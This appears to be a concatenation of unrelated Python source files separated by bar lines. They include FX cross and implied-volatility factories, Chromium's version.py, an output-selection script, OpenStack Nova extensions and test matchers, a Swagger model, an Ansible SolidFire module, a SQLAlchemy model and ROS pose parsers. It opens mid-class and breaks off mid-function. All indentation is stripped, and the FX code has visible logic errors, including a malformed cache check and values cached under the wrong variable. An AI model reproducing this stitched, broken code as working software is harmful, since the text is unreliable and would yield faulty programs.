def _get_individual_fx_cross(self, market_data_request):
cr = market_data_request.cross
type = market_data_request.type
freq = market_data_request.freq
base = cr[0:3]
terms = cr[3:6]
if (type == 'spot'):
# non-USD crosses
if base != 'USD' and terms != 'USD':
base_USD = self.fxconv.correct_notation('USD' + base)
terms_USD = self.fxconv.correct_notation('USD' + terms)
# TODO check if the cross exists in the database
# download base USD cross
market_data_request.tickers = base_USD
market_data_request.category = 'fx'
if base_USD + '.close' in self.cache:
base_vals = self.cache[base_USD + '.close']
else:
base_vals = self.market_data_generator.fetch_market_data(market_data_request)
self.cache[base_USD + '.close'] = base_vals
# download terms USD cross
market_data_request.tickers = terms_USD
market_data_request.category = 'fx'
if terms_USD + '.close' in self.cache:
terms_vals = self.cache[terms_USD + '.close']
else:
terms_vals = self.market_data_generator.fetch_market_data(market_data_request)
self.cache[terms_USD + '.close'] = terms_vals
# if quoted USD/base flip to get USD terms
if (base_USD[0:3] == 'USD'):
if 'USD' + base in '.close' in self.cache:
base_vals = self.cache['USD' + base + '.close']
else:
base_vals = 1 / base_vals
self.cache['USD' + base + '.close'] = base_vals
# if quoted USD/terms flip to get USD terms
if (terms_USD[0:3] == 'USD'):
if 'USD' + terms in '.close' in self.cache:
terms_vals = self.cache['USD' + terms + '.close']
else:
terms_vals = 1 / terms_vals
self.cache['USD' + terms + '.close'] = base_vals
base_vals.columns = ['temp'];
terms_vals.columns = ['temp']
cross_vals = base_vals.div(terms_vals, axis='index')
cross_vals.columns = [cr + '.close']
base_vals.columns = [base_USD + '.close']
terms_vals.columns = [terms_USD + '.close']
else:
# if base == 'USD': non_USD = terms
# if terms == 'USD': non_USD = base
correct_cr = self.fxconv.correct_notation(cr)
market_data_request.tickers = correct_cr
market_data_request.category = 'fx'
if correct_cr + '.close' in self.cache:
cross_vals = self.cache[correct_cr + '.close']
else:
cross_vals = self.market_data_generator.fetch_market_data(market_data_request)
# flip if not convention
if (correct_cr != cr):
if cr + '.close' in self.cache:
cross_vals = self.cache[cr + '.close']
else:
cross_vals = 1 / cross_vals
self.cache[cr + '.close'] = cross_vals
self.cache[correct_cr + '.close'] = cross_vals
# cross_vals = self.market_data_generator.harvest_time_series(market_data_request)
cross_vals.columns.names = [cr + '.close']
elif type[0:3] == "tot":
if freq == 'daily':
# download base USD cross
market_data_request.tickers = base + 'USD'
market_data_request.category = 'fx-tot'
if type == "tot":
base_vals = self.market_data_generator.fetch_market_data(market_data_request)
else:
x = 0
# download terms USD cross
market_data_request.tickers = terms + 'USD'
market_data_request.category = 'fx-tot'
if type == "tot":
terms_vals = self.market_data_generator.fetch_market_data(market_data_request)
else:
pass
base_rets = self.calculations.calculate_returns(base_vals)
terms_rets = self.calculations.calculate_returns(terms_vals)
cross_rets = base_rets.sub(terms_rets.iloc[:, 0], axis=0)
# first returns of a time series will by NaN, given we don't know previous point
cross_rets.iloc[0] = 0
cross_vals = self.calculations.create_mult_index(cross_rets)
cross_vals.columns = [cr + '-tot.close']
elif freq == 'intraday':
self.logger.info('Total calculated returns for intraday not implemented yet')
return None
return cross_vals
#######################################################################################################################
"""
FXVolFactory
Class generates FX implied volatility time series and surfaces (using very simple interpolation!).
"""
import pandas
from findatapy.market.marketdatarequest import MarketDataRequest
from findatapy.util import LoggerManager
from findatapy.timeseries import Calculations, Filter, Timezone
class FXVolFactory(object):
# types of quotation on vol surface
# ATM, 25d riskies, 10d riskies, 25d strangles, 10d strangles
part = ["V", "25R", "10R", "25B", "10B"]
# all the tenors on our vol surface
tenor = ["ON", "1W", "2W", "3W", "1M", "2M", "3M", "6M", "9M", "1Y", "2Y", "3Y", "5Y"]
def __init__(self, market_data_generator=None):
self.logger = LoggerManager().getLogger(__name__)
self.market_data_generator = market_data_generator
self.calculations = Calculations()
self.filter = Filter()
self.timezone = Timezone()
self.rates = RatesFactory()
return
def get_fx_implied_vol(self, start, end, cross, tenor, cut="BGN", source="bloomberg", part="V",
cache_algo="internet_load_return"):
""" get_implied_vol = get implied vol for specified cross, tenor and part of surface
:param start: start date
:param end: end date
:param cross: asset to be calculated
:param tenor: tenor to calculate
:param cut: closing time of data
:param source: source of data eg. bloomberg
:param part: part of vol surface eg. V for ATM implied vol, 25R 25 delta risk reversal
:return: realised volatility
"""
market_data_generator = self.market_data_generator
if isinstance(cross, str): cross = [cross]
if isinstance(tenor, str): tenor = [tenor]
if isinstance(part, str): part = [part]
tickers = []
for cr in cross:
for tn in tenor:
for pt in part:
tickers.append(cr + pt + tn)
market_data_request = MarketDataRequest(
start_date=start, finish_date=end,
data_source=source,
category='fx-implied-vol',
freq='daily',
cut=cut,
tickers=tickers,
fields=['close'],
cache_algo=cache_algo,
environment='backtest'
)
data_frame = market_data_generator.fetch_market_data(market_data_request)
data_frame.index.name = 'Date'
return data_frame
def extract_vol_surface_for_date(self, df, cross, date_index):
# assume we have a matrix of the form
# eg. EURUSDVON.close ...
# types of quotation on vol surface
# self.part = ["V", "25R", "10R", "25B", "10B"]
# all the tenors on our vol surface
# self.tenor = ["ON", "1W", "2W", "3W", "1M", "2M", "3M", "6M", "9M", "1Y", "2Y", "5Y"]
strikes = ["10DP",
"25DP",
"ATM",
"25DC",
"10DC"]
tenor = self.tenor
df_surf = pandas.DataFrame(index=strikes, columns=tenor)
for ten in tenor:
df_surf.ix["10DP", ten] = df.ix[date_index, cross + "V" + ten + ".close"] \
- (df.ix[date_index, cross + "10R" + ten + ".close"] / 2.0) \
+ (df.ix[date_index, cross + "10B" + ten + ".close"])
df_surf.ix["10DC", ten] = df.ix[date_index, cross + "V" + ten + ".close"] \
+ (df.ix[date_index, cross + "10R" + ten + ".close"] / 2.0) \
+ (df.ix[date_index, cross + "10B" + ten + ".close"])
df_surf.ix["25DP", ten] = df.ix[date_index, cross + "V" + ten + ".close"] \
- (df.ix[date_index, cross + "25R" + ten + ".close"] / 2.0) \
+ (df.ix[date_index, cross + "25B" + ten + ".close"])
df_surf.ix["25DC", ten] = df.ix[date_index, cross + "V" + ten + ".close"] \
+ (df.ix[date_index, cross + "25R" + ten + ".close"] / 2.0) \
+ (df.ix[date_index, cross + "25B" + ten + ".close"])
df_surf.ix["ATM", ten] = df.ix[date_index, cross + "V" + ten + ".close"]
return df_surf
#######################################################################################################################
class RatesFactory(object):
def __init__(self, market_data_generator=None):
self.logger = LoggerManager().getLogger(__name__)
self.cache = {}
self.calculations = Calculations()
self.market_data_generator = market_data_generator
return
# all the tenors on our forwards
# forwards_tenor = ["ON", "1W", "2W", "3W", "1M", "2M", "3M", "6M", "9M", "1Y", "2Y", "3Y", "5Y"]
def get_base_depos(self, start, end, currencies, tenor, cut="NYC", source="bloomberg",
cache_algo="internet_load_return"):
""" get_forward_points = get forward points for specified cross, tenor and part of surface
:param start: start date
:param end: end date
:param cross: asset to be calculated
:param tenor: tenor to calculate
:param cut: closing time of data
:param source: source of data eg. bloomberg
:return: forward points
"""
market_data_generator = self.market_data_generator
if isinstance(currencies, str): currencies = [currencies]
if isinstance(tenor, str): tenor = [tenor]
tickers = []
for cr in currencies:
for tn in tenor:
tickers.append(cr + tn)
market_data_request = MarketDataRequest(
start_date=start, finish_date=end,
data_source=source,
category='base-depos',
freq='daily',
cut=cut,
tickers=tickers,
fields=['close'],
cache_algo=cache_algo,
environment='backtest'
)
data_frame = market_data_generator.fetch_market_data(market_data_request)
data_frame.index.name = 'Date'
return data_frame
def get_fx_forward_points(self, start, end, cross, tenor, cut="BGN", source="bloomberg",
cache_algo="internet_load_return"):
""" get_forward_points = get forward points for specified cross, tenor and part of surface
:param start: start date
:param end: end date
:param cross: asset to be calculated
:param tenor: tenor to calculate
:param cut: closing time of data
:param source: source of data eg. bloomberg
:return: forward points
"""
market_data_request = MarketDataRequest()
market_data_generator = self.market_data_generator
market_data_request.data_source = source # use bbg as a source
market_data_request.start_date = start # start_date
market_data_request.finish_date = end # finish_date
if isinstance(cross, str): cross = [cross]
if isinstance(tenor, str): tenor = [tenor]
tenor = [x.replace('1Y', '12M') for x in tenor]
tickers = []
for cr in cross:
for tn in tenor:
tickers.append(cr + tn)
market_data_request = MarketDataRequest(
start_date = start, finish_date = end,
data_source = source,
category = 'fx-forwards',
freq = 'daily',
cut = cut,
tickers=tickers,
fields = ['close'],
cache_algo = cache_algo,
environment = 'backtest'
)
data_frame = market_data_generator.fetch_market_data(market_data_request)
data_frame.columns = [x.replace('12M', '1Y') for x in data_frame.columns]
data_frame.index.name = 'Date'
return data_frame
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# (See http://src.chromium.org/viewvc/chrome/trunk/src/LICENSE)
# This file itself is from
# http://src.chromium.org/viewvc/chrome/trunk/src/build/util/ as of
# revision r252481
"""
version.py -- Chromium version string substitution utility.
"""
import getopt
import os
import sys
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
def fetch_values_from_file(values_dict, file_name):
"""
Fetches KEYWORD=VALUE settings from the specified file.
Everything to the left of the first '=' is the keyword,
everything to the right is the value. No stripping of
white space, so beware.
The file must exist, otherwise you get the Python exception from open().
"""
for line in open(file_name, 'r').readlines():
key, val = line.rstrip('\r\n').split('=', 1)
values_dict[key] = val
def fetch_values(file_list):
"""
Returns a dictionary of values to be used for substitution, populating
the dictionary with KEYWORD=VALUE settings from the files in 'file_list'.
Explicitly adds the following value from internal calculations:
OFFICIAL_BUILD
"""
CHROME_BUILD_TYPE = os.environ.get('CHROME_BUILD_TYPE')
if CHROME_BUILD_TYPE == '_official':
official_build = '1'
else:
official_build = '0'
values = dict(
OFFICIAL_BUILD = official_build,
)
for file_name in file_list:
fetch_values_from_file(values, file_name)
return values
def subst_template(contents, values):
"""
Returns the template with substituted values from the specified dictionary.
Keywords to be substituted are surrounded by '@': @KEYWORD@.
No attempt is made to avoid recursive substitution. The order
of evaluation is random based on the order of the keywords returned
by the Python dictionary. So do NOT substitute a value that
contains any @KEYWORD@ strings expecting them to be recursively
substituted, okay?
"""
for key, val in values.iteritems():
try:
contents = contents.replace('@' + key + '@', val)
except TypeError:
print repr(key), repr(val)
return contents
def subst_file(file_name, values):
"""
Returns the contents of the specified file_name with substited
values from the specified dictionary.
This is like subst_template, except it operates on a file.
"""
template = open(file_name, 'r').read()
return subst_template(template, values);
def write_if_changed(file_name, contents):
"""
Writes the specified contents to the specified file_name
iff the contents are different than the current contents.
"""
try:
old_contents = open(file_name, 'r').read()
except EnvironmentError:
pass
else:
if contents == old_contents:
return
os.unlink(file_name)
open(file_name, 'w').write(contents)
def main(argv=None):
if argv is None:
argv = sys.argv
short_options = 'e:f:i:o:t:h'
long_options = ['eval=', 'file=', 'help']
helpstr = """\
Usage: version.py [-h] [-f FILE] ([[-i] FILE] | -t TEMPLATE) [[-o] FILE]
-f FILE, --file=FILE Read variables from FILE.
-i FILE, --input=FILE Read strings to substitute from FILE.
-o FILE, --output=FILE Write substituted strings to FILE.
-t TEMPLATE, --template=TEMPLATE Use TEMPLATE as the strings to substitute.
-e VAR=VAL, --eval=VAR=VAL Evaluate VAL after reading variables. Can
be used to synthesize variables. e.g.
-e 'PATCH_HI=int(PATCH)/256'.
-h, --help Print this help and exit.
"""
evals = {}
variable_files = []
in_file = None
out_file = None
template = None
try:
try:
opts, args = getopt.getopt(argv[1:], short_options, long_options)
except getopt.error, msg:
raise Usage(msg)
for o, a in opts:
if o in ('-e', '--eval'):
try:
evals.update(dict([a.split('=',1)]))
except ValueError:
raise Usage("-e requires VAR=VAL")
elif o in ('-f', '--file'):
variable_files.append(a)
elif o in ('-i', '--input'):
in_file = a
elif o in ('-o', '--output'):
out_file = a
elif o in ('-t', '--template'):
template = a
elif o in ('-h', '--help'):
print helpstr
return 0
while len(args) and (in_file is None or out_file is None or
template is None):
if in_file is None:
in_file = args.pop(0)
elif out_file is None:
out_file = args.pop(0)
if args:
msg = 'Unexpected arguments: %r' % args
raise Usage(msg)
except Usage, err:
sys.stderr.write(err.msg)
sys.stderr.write('; Use -h to get help.\n')
return 2
values = fetch_values(variable_files)
for key, val in evals.iteritems():
values[key] = str(eval(val, globals(), values))
if template is not None:
contents = subst_template(template, values)
elif in_file:
contents = subst_file(in_file, values)
else:
# Generate a default set of version information.
contents = """MAJOR=%(MAJOR)s
MINOR=%(MINOR)s
BUILD=%(BUILD)s
PATCH=%(PATCH)s
LASTCHANGE=%(LASTCHANGE)s
OFFICIAL_BUILD=%(OFFICIAL_BUILD)s
""" % values
if out_file:
write_if_changed(out_file, contents)
else:
print contents
return 0
if __name__ == '__main__':
sys.exit(main())
|
import argparse, logging, codecs
from nltk.translate.bleu_score import sentence_bleu as bleu
from nltk.corpus import stopwords
stopw = set(stopwords.words('english'))
def setup_args():
parser = argparse.ArgumentParser()
parser.add_argument('out1', help = 'Output 1')
parser.add_argument('out2', help = 'Output 2')
parser.add_argument('input', help = 'Input')
parser.add_argument('output', help='Selected Output')
args = parser.parse_args()
return args
def get_scores(candidate1, candidate2, input):
#score_1 = bleu([input.split()], candidate1.split(), weights=(1.0,))
#score_2 = bleu([input.split()], candidate2.split(), weights=(1.0,))
input_kw = set(input.split()) - stopw
kw1 = set(candidate1.split()) - stopw
kw2 = set(candidate2.split()) - stopw
match1 = kw1.intersection(input_kw)
match2 = kw2.intersection(input_kw)
return len(match1), len(match2)
def main():
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
args = setup_args()
logging.info(args)
out1_lines = codecs.open(args.out1, 'r', 'utf-8').readlines()
out2_lines = codecs.open(args.out2, 'r', 'utf-8').readlines()
picked_num1 = 0
picked_num2 = 0
input_lines = codecs.open(args.input, 'r').readlines()
fw = codecs.open(args.output, 'w', 'utf-8')
for index, (out1, out2, input) in enumerate(zip(out1_lines, out2_lines, input_lines)):
q2 = input.split('END')[2]
score_1, score_2 = get_scores(out1, out2, q2)
logging.info('Index:%d score1: %f score2: %f'% (index, score_1, score_2))
if score_1 >= score_2:
picked_out = out1
picked_num1 += 1
else:
picked_out = out2
picked_num2 +=1
fw.write(picked_out.strip() + '\n')
logging.info('Picked1: %d Picked:%d'% (picked_num1, picked_num2))
if __name__ == '__main__':
main()
|
# Copyright 2011 OpenStack Foundation
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
ALIAS = "os-lock-server"
def authorize(context, action_name):
action = 'v3:%s:%s' % (ALIAS, action_name)
extensions.extension_authorizer('compute', action)(context)
class LockServerController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(LockServerController, self).__init__(*args, **kwargs)
self.compute_api = compute.API()
@wsgi.response(202)
@extensions.expected_errors(404)
@wsgi.action('lock')
def _lock(self, req, id, body):
"""Lock a server instance."""
context = req.environ['nova.context']
authorize(context, 'lock')
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
self.compute_api.lock(context, instance)
@wsgi.response(202)
@extensions.expected_errors(404)
@wsgi.action('unlock')
def _unlock(self, req, id, body):
"""Unlock a server instance."""
context = req.environ['nova.context']
authorize(context, 'unlock')
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
self.compute_api.unlock(context, instance)
class LockServer(extensions.V3APIExtensionBase):
"""Enable lock/unlock server actions."""
name = "LockServer"
alias = ALIAS
version = 1
def get_controller_extensions(self):
controller = LockServerController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
def get_resources(self):
return []
|
# coding: utf-8
"""
OpenAPI spec version:
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class V1GitSourceRevision(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
operations = [
]
# The key is attribute name
# and the value is attribute type.
swagger_types = {
'commit': 'str',
'author': 'V1SourceControlUser',
'committer': 'V1SourceControlUser',
'message': 'str'
}
# The key is attribute name
# and the value is json key in definition.
attribute_map = {
'commit': 'commit',
'author': 'author',
'committer': 'committer',
'message': 'message'
}
def __init__(self, commit=None, author=None, committer=None, message=None):
"""
V1GitSourceRevision - a model defined in Swagger
"""
self._commit = commit
self._author = author
self._committer = committer
self._message = message
@property
def commit(self):
"""
Gets the commit of this V1GitSourceRevision.
Commit is the commit hash identifying a specific commit
:return: The commit of this V1GitSourceRevision.
:rtype: str
"""
return self._commit
@commit.setter
def commit(self, commit):
"""
Sets the commit of this V1GitSourceRevision.
Commit is the commit hash identifying a specific commit
:param commit: The commit of this V1GitSourceRevision.
:type: str
"""
self._commit = commit
@property
def author(self):
"""
Gets the author of this V1GitSourceRevision.
Author is the author of a specific commit
:return: The author of this V1GitSourceRevision.
:rtype: V1SourceControlUser
"""
return self._author
@author.setter
def author(self, author):
"""
Sets the author of this V1GitSourceRevision.
Author is the author of a specific commit
:param author: The author of this V1GitSourceRevision.
:type: V1SourceControlUser
"""
self._author = author
@property
def committer(self):
"""
Gets the committer of this V1GitSourceRevision.
Committer is the committer of a specific commit
:return: The committer of this V1GitSourceRevision.
:rtype: V1SourceControlUser
"""
return self._committer
@committer.setter
def committer(self, committer):
"""
Sets the committer of this V1GitSourceRevision.
Committer is the committer of a specific commit
:param committer: The committer of this V1GitSourceRevision.
:type: V1SourceControlUser
"""
self._committer = committer
@property
def message(self):
"""
Gets the message of this V1GitSourceRevision.
Message is the description of a specific commit
:return: The message of this V1GitSourceRevision.
:rtype: str
"""
return self._message
@message.setter
def message(self, message):
"""
Sets the message of this V1GitSourceRevision.
Message is the description of a specific commit
:param message: The message of this V1GitSourceRevision.
:type: str
"""
self._message = message
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(V1GitSourceRevision.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
#!/usr/bin/python
# (c) 2017, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: sf_volume_access_group_manager
short_description: Manage SolidFire Volume Access Groups
extends_documentation_fragment:
- netapp.solidfire
version_added: '2.3'
author: Sumit Kumar ([email protected])
description:
- Create, destroy, or update volume access groups on SolidFire
options:
state:
description:
- Whether the specified volume access group should exist or not.
required: true
choices: ['present', 'absent']
name:
description:
- Name of the volume access group. It is not required to be unique, but recommended.
required: true
initiators:
description:
- List of initiators to include in the volume access group. If unspecified, the access group will start out without configured initiators.
required: false
default: None
volumes:
description:
- List of volumes to initially include in the volume access group. If unspecified, the access group will start without any volumes.
required: false
default: None
virtual_network_id:
description:
- The ID of the SolidFire Virtual Network ID to associate the volume access group with.
required: false
default: None
virtual_network_tags:
description:
- The ID of the VLAN Virtual Network Tag to associate the volume access group with.
required: false
default: None
attributes:
description: List of Name/Value pairs in JSON object format.
required: false
default: None
volume_access_group_id:
description:
- The ID of the volume access group to modify or delete.
required: false
default: None
'''
EXAMPLES = """
- name: Create Volume Access Group
sf_volume_access_group_manager:
hostname: "{{ solidfire_hostname }}"
username: "{{ solidfire_username }}"
password: "{{ solidfire_password }}"
state: present
name: AnsibleVolumeAccessGroup
volumes: [7,8]
- name: Modify Volume Access Group
sf_volume_access_group_manager:
hostname: "{{ solidfire_hostname }}"
username: "{{ solidfire_username }}"
password: "{{ solidfire_password }}"
state: present
volume_access_group_id: 1
name: AnsibleVolumeAccessGroup-Renamed
attributes: {"volumes": [1,2,3], "virtual_network_id": 12345}
- name: Delete Volume Access Group
sf_volume_access_group_manager:
hostname: "{{ solidfire_hostname }}"
username: "{{ solidfire_username }}"
password: "{{ solidfire_password }}"
state: absent
volume_access_group_id: 1
"""
RETURN = """
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
HAS_SF_SDK = netapp_utils.has_sf_sdk()
class SolidFireVolumeAccessGroup(object):
def __init__(self):
self.argument_spec = netapp_utils.ontap_sf_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent']),
name=dict(required=True, type='str'),
volume_access_group_id=dict(required=False, type='int', default=None),
initiators=dict(required=False, type='list', default=None),
volumes=dict(required=False, type='list', default=None),
virtual_network_id=dict(required=False, type='list', default=None),
virtual_network_tags=dict(required=False, type='list', default=None),
attributes=dict(required=False, type='dict', default=None),
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
supports_check_mode=True
)
p = self.module.params
# set up state variables
self.state = p['state']
self.name = p['name']
self.volume_access_group_id = p['volume_access_group_id']
self.initiators = p['initiators']
self.volumes = p['volumes']
self.virtual_network_id = p['virtual_network_id']
self.virtual_network_tags = p['virtual_network_tags']
self.attributes = p['attributes']
if HAS_SF_SDK is False:
self.module.fail_json(msg="Unable to import the SolidFire Python SDK")
else:
self.sfe = netapp_utils.create_sf_connection(module=self.module)
def get_volume_access_group(self):
access_groups_list = self.sfe.list_volume_access_groups()
for group in access_groups_list.volume_access_groups:
if group.name == self.name:
# Update self.volume_access_group_id:
if self.volume_access_group_id is not None:
if group.volume_access_group_id == self.volume_access_group_id:
return group
else:
self.volume_access_group_id = group.volume_access_group_id
return group
return None
def create_volume_access_group(self):
try:
self.sfe.create_volume_access_group(name=self.name,
initiators=self.initiators,
volumes=self.volumes,
virtual_network_id=self.virtual_network_id,
virtual_network_tags=self.virtual_network_tags,
attributes=self.attributes)
except Exception as e:
self.module.fail_json(msg="Error creating volume access group %s: %s" %
(self.name, to_native(e)), exception=traceback.format_exc())
def delete_volume_access_group(self):
try:
self.sfe.delete_volume_access_group(volume_access_group_id=self.volume_access_group_id)
except Exception as e:
self.module.fail_json(msg="Error deleting volume access group %s: %s" %
(self.volume_access_group_id, to_native(e)),
exception=traceback.format_exc())
def update_volume_access_group(self):
try:
self.sfe.modify_volume_access_group(volume_access_group_id=self.volume_access_group_id,
virtual_network_id=self.virtual_network_id,
virtual_network_tags=self.virtual_network_tags,
name=self.name,
initiators=self.initiators,
volumes=self.volumes,
attributes=self.attributes)
except Exception as e:
self.module.fail_json(msg="Error updating volume access group %s: %s" %
(self.volume_access_group_id, to_native(e)), exception=traceback.format_exc())
def apply(self):
changed = False
group_exists = False
update_group = False
group_detail = self.get_volume_access_group()
if group_detail:
group_exists = True
if self.state == 'absent':
changed = True
elif self.state == 'present':
# Check if we need to update the group
if self.volumes is not None and group_detail.volumes != self.volumes:
update_group = True
changed = True
elif self.initiators is not None and group_detail.initiators != self.initiators:
update_group = True
changed = True
elif self.virtual_network_id is not None or self.virtual_network_tags is not None or \
self.attributes is not None:
update_group = True
changed = True
else:
if self.state == 'present':
changed = True
if changed:
if self.module.check_mode:
pass
else:
if self.state == 'present':
if not group_exists:
self.create_volume_access_group()
elif update_group:
self.update_volume_access_group()
elif self.state == 'absent':
self.delete_volume_access_group()
self.module.exit_json(changed=changed)
def main():
v = SolidFireVolumeAccessGroup()
v.apply()
if __name__ == '__main__':
main()
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Matcher classes to be used inside of the testtools assertThat framework."""
import pprint
class DictKeysMismatch(object):
def __init__(self, d1only, d2only):
self.d1only = d1only
self.d2only = d2only
def describe(self):
return ('Keys in d1 and not d2: %(d1only)s.'
' Keys in d2 and not d1: %(d2only)s' %
{'d1only': self.d1only, 'd2only': self.d2only})
def get_details(self):
return {}
class DictMismatch(object):
def __init__(self, key, d1_value, d2_value):
self.key = key
self.d1_value = d1_value
self.d2_value = d2_value
def describe(self):
return ("Dictionaries do not match at %(key)s."
" d1: %(d1_value)s d2: %(d2_value)s" %
{'d1_value': self.d1_value, 'd2_value': self.d2_value})
def get_details(self):
return {}
class DictMatches(object):
def __init__(self, d1, approx_equal=False, tolerance=0.001):
self.d1 = d1
self.approx_equal = approx_equal
self.tolerance = tolerance
def __str__(self):
return 'DictMatches(%s)' % (pprint.pformat(self.d1))
# Useful assertions
def match(self, d2):
"""Assert two dicts are equivalent.
This is a 'deep' match in the sense that it handles nested
dictionaries appropriately.
NOTE:
If you don't care (or don't know) a given value, you can specify
the string DONTCARE as the value. This will cause that dict-item
to be skipped.
"""
d1keys = set(self.d1.keys())
d2keys = set(d2.keys())
if d1keys != d2keys:
d1only = d1keys - d2keys
d2only = d2keys - d1keys
return DictKeysMismatch(d1only, d2only)
for key in d1keys:
d1value = self.d1[key]
d2value = d2[key]
try:
error = abs(float(d1value) - float(d2value))
within_tolerance = error <= self.tolerance
except (ValueError, TypeError):
# If both values aren't convertible to float, just ignore
# ValueError if arg is a str, TypeError if it's something else
# (like None)
within_tolerance = False
if hasattr(d1value, 'keys') and hasattr(d2value, 'keys'):
matcher = DictMatches(d1value)
did_match = matcher.match(d2value)
if did_match is not None:
return did_match
elif 'DONTCARE' in (d1value, d2value):
continue
elif self.approx_equal and within_tolerance:
continue
elif d1value != d2value:
return DictMismatch(key, d1value, d2value)
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
__author__ = 'RemiZOffAlex'
__copyright__ = '(c) RemiZOffAlex'
__license__ = 'MIT'
__email__ = '[email protected]'
__url__ = 'http://remizoffalex.ru'
import datetime
from sqlalchemy import Table, Column, Boolean, Integer, ForeignKey, String, DateTime, Float
from sqlalchemy.orm import relationship
from . import Base
class TrashClient(Base):
"""
Корзина для клиентов
"""
__tablename__ = "trashclient"
id = Column(Integer, primary_key=True)
# ID пользователя
user_id = Column(Integer, ForeignKey('user.id'))
# ID книги
client_id = Column(Integer, ForeignKey('client.id'))
# Дата удаления
created = Column(DateTime)
# Связи
user = relationship("User", primaryjoin="TrashClient.user_id==User.id")
client = relationship("Client", primaryjoin="TrashClient.client_id==Client.id")
def __init__(self, user, client):
assert type(user).__name__=='User', app.logger.info('Не передан объект User')
assert type(client).__name__=='Client', app.logger.info('Не передан объект Client')
self.user_id = user.id
self.client_id = client.id
self.created = datetime.datetime.utcnow()
|
#!/usr/bin/env python
import roslib
import rospy
import smach
import smach_ros
from geometry_msgs.msg import Point
from geometry_msgs.msg import Point32
from geometry_msgs.msg import PointStamped
from geometry_msgs.msg import Pose
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import Quaternion
from geometry_msgs.msg import PoseArray
from sensor_msgs.msg import PointCloud
from sensor_msgs import point_cloud2 as pc2
from sensor_msgs.msg import PointCloud2
from sensor_msgs.point_cloud2 import create_cloud_xyz32
import threading
def parse_pointstamped(point_input):
"""
Parse point_input into PointStamped.
"""
try:
assert isinstance(point_input, PointStamped)
return point_input
except:
pass
try:
assert isinstance(point_input, Point)
point = PointStamped(point = point_input)
point.header.stamp = rospy.Time.now()
return point
except:
pass
try:
assert isinstance(point_input, Point32)
point = PointStamped(point = Point(x=point_input.x, y=point_input.y, z=point_input.z))
point.header.stamp = rospy.Time.now()
return point
except:
pass
try:
point = point_input
point = PointStamped(point = Point(x=point[0], y=point[1], z=point[2]))
point.header.stamp = rospy.Time.now()
return point
except Exception as e:
raise ValueError('Point not properly specified (should be Point, PointStamped or [3] list type)!')
def parse_posestamped(pose_input):
"""
Parse pose_input into PoseStamped.
"""
try:
assert isinstance(pose_input, PoseStamped)
return pose_input
except:
pass
try:
assert isinstance(pose_input, Pose)
pose = PoseStamped(pose = pose_input)
pose.header.stamp = rospy.Time.now()
return pose
except:
pass
try:
pose = pose_input
position = Point(x=pose_input[0][0], y=pose_input[0][1], z=pose_input[0][2])
orientation = Quaternion(x=pose_input[1][0], y=pose_input[1][1], z=pose_input[1][2], w=pose_input[1][3])
pose = PoseStamped(pose = Pose(position=position, orientation=orientation))
pose.header.stamp = rospy.Time.now()
return pose
except Exception as e:
raise ValueError('Pose not properly specified (should be Pose, PoseStamped or [[3],[4]] list)!')
def parse_posearray(posearray_input):
"""
Parse posearray_input into a PoseArray.
"""
try:
assert isinstance(posearray_input, PoseArray)
return posearray_input
except:
pass
try:
assert isinstance(posearray_input, list)
